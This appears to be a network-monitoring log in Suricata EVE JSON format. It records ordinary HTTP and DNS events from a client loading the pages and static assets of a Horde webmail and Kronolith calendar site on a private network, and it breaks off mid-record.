{"timestamp":"2020-02-29T00:22:31.987599+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8088},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47027,"tx_id":0}} {"timestamp":"2020-02-29T00:22:31.998142+0000","flow_id":945608701983486,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59959,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64994,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:32.109469+0000","flow_id":945608701983486,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59959,"proto":"UDP","dns":{"type":"answer","id":64994,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:32.109469+0000","flow_id":945608701983486,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59959,"proto":"UDP","dns":{"type":"answer","id":64994,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:32.243374+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24488}} 
{"timestamp":"2020-02-29T00:22:32.262695+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24488},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:22:32.265743+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451}} {"timestamp":"2020-02-29T00:22:32.277233+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":10823,"tx_id":2}} 
{"timestamp":"2020-02-29T00:22:32.277645+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470}} {"timestamp":"2020-02-29T00:22:32.301116+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":17678,"tx_id":3}} {"timestamp":"2020-02-29T00:22:32.301648+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046}} 
{"timestamp":"2020-02-29T00:22:32.316886+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046},"app_proto":"http","fileinfo":{"filename":"\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":10406,"tx_id":4}} {"timestamp":"2020-02-29T00:22:32.317655+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376}} {"timestamp":"2020-02-29T00:22:32.325552+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":24731,"tx_id":5}} {"timestamp":"2020-02-29T00:22:32.331346+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401}} {"timestamp":"2020-02-29T00:22:32.332479+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401},"app_proto":"http","fileinfo":{"filename":"\/js\/colorpicker.js","state":"CLOSED","stored":false,"size":12973,"tx_id":6}} {"timestamp":"2020-02-29T00:22:32.332753+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566}} {"timestamp":"2020-02-29T00:22:32.339316+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24826},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/kronolith.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:22:32.341602+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":50590}} {"timestamp":"2020-02-29T00:22:32.362889+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566},"app_proto":"http","fileinfo":{"filename":"\/js\/form_ghost.js","state":"CLOSED","stored":false,"size":4231,"tx_id":7}} {"timestamp":"2020-02-29T00:22:32.363312+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168}} {"timestamp":"2020-02-29T00:22:32.365078+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688}} {"timestamp":"2020-02-29T00:22:32.365122+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363}} 
{"timestamp":"2020-02-29T00:22:32.366760+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/search-topbar.png","state":"CLOSED","stored":false,"size":363,"tx_id":1}} {"timestamp":"2020-02-29T00:22:32.368121+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/doorbell.wav","state":"CLOSED","stored":false,"size":5168,"tx_id":8}} {"timestamp":"2020-02-29T00:22:32.370139+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/gnid3.wav","state":"CLOSED","stored":false,"size":13688,"tx_id":0}} {"timestamp":"2020-02-29T00:22:32.371064+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776}} {"timestamp":"2020-02-29T00:22:32.409302+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151}} {"timestamp":"2020-02-29T00:22:32.413250+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256}} {"timestamp":"2020-02-29T00:22:32.456633+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/theetone.wav","state":"CLOSED","stored":false,"size":24776,"tx_id":1}} {"timestamp":"2020-02-29T00:22:32.457564+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:22:32.458694+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/reminder.wav","state":"CLOSED","stored":false,"size":23151,"tx_id":9}} {"timestamp":"2020-02-29T00:22:32.458965+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292}} {"timestamp":"2020-02-29T00:22:32.459967+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-split.png","state":"CLOSED","stored":false,"size":74,"tx_id":2}} {"timestamp":"2020-02-29T00:22:32.463130+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux 
x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101}} {"timestamp":"2020-02-29T00:22:32.466189+0000","flow_id":1506488481224280,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52962,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:22:32.463757+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/left.png","state":"CLOSED","stored":false,"size":292,"tx_id":10}} {"timestamp":"2020-02-29T00:22:32.464795+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:22:32.466618+0000","flow_id":381567826925203,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52964,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358}} {"timestamp":"2020-02-29T00:22:32.467428+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/dayview.png","state":"CLOSED","stored":false,"size":349,"tx_id":11}} {"timestamp":"2020-02-29T00:22:32.468297+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-active-bg.png","state":"CLOSED","stored":false,"size":101,"tx_id":3}} {"timestamp":"2020-02-29T00:22:32.467174+0000","flow_id":1879111253891026,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52966,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301}} {"timestamp":"2020-02-29T00:22:32.468392+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:22:32.467975+0000","flow_id":381567826925203,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52964,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/monthview.png","state":"CLOSED","stored":false,"size":358,"tx_id":0}} {"timestamp":"2020-02-29T00:22:32.468862+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/workweekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":12}} {"timestamp":"2020-02-29T00:22:32.470541+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 